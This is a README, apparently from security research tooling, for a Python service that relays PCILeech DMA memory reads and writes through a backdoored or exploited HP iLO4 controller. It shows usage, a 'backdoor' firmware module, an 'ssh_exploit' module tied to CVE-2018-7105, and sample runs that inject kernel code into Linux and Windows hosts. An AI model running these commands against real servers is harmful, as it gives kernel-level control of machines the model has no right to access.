PCILeech HP iLO4 Service

This is a Python service relaying read and write queries from PCILeech to an HP iLO4 device flashed with a modified firmware.

Usage

$ python run.py -h
usage: run.py [-h] [-m MODULE] [-u USER] [-p PASSWORD] [-P PORT] [-v]
              remote_addr

HP iLO4 PCILeech service

positional arguments:
  remote_addr           IP address of the target iLO4 interface

optional arguments:
  -h, --help            show this help message and exit
  -m MODULE, --module MODULE
                        Module to use (backdoor, ssh_exploit)
  -u USER, --user USER  user name
  -p PASSWORD, --password PASSWORD
                        SSH password
  -P PORT, --port PORT  SSH port
  -v, --verbose         verbosity

Modules

backdoor

This module uses the modified firmware developed as a demonstration for the SSTIC presentation.

Tools to build and flash this firmware are available on the ilo4_toolbox repository.

/pcileech_hpilo4_service$ python run.py -m backdoor 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd LINUX_X64_48 

 Current Action: Scanning for Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       748 / 268435422 (0%)
 Speed:          6 MB/s
 Address:        0x000000002FA00000
 Pages read:     191488 / 68719468032 (0%)
 Pages failed:   0 (0%)

 Current Action: Verifying Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       32 / 32 (100%)
 Speed:          1 MB/s
 Address:        0x0000000031A00000
 Pages read:     8192 / 8192 (100%)
 Pages failed:   0 (0%)
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x76680000

real    2m38.038s

ssh_exploit

This module uses the in-memory implant installed by the SSH service exploit (CVE-2018-7105) written by IooNag.

The exploit is available on the ilo4_toolbox repository and should be run before using this service.

Dumping large amounts of memory with this module is not recommended. Therefore, do not use it against a Linux system, since that requires dumping 16MB of kernel memory.

/pcileech_hpilo4_service$ python run.py -v -m ssh_exploit -u admin -p password 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd WIN10_X64

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffe000

real	1m0.826s
user	0m0.000s
sys	0m0.010s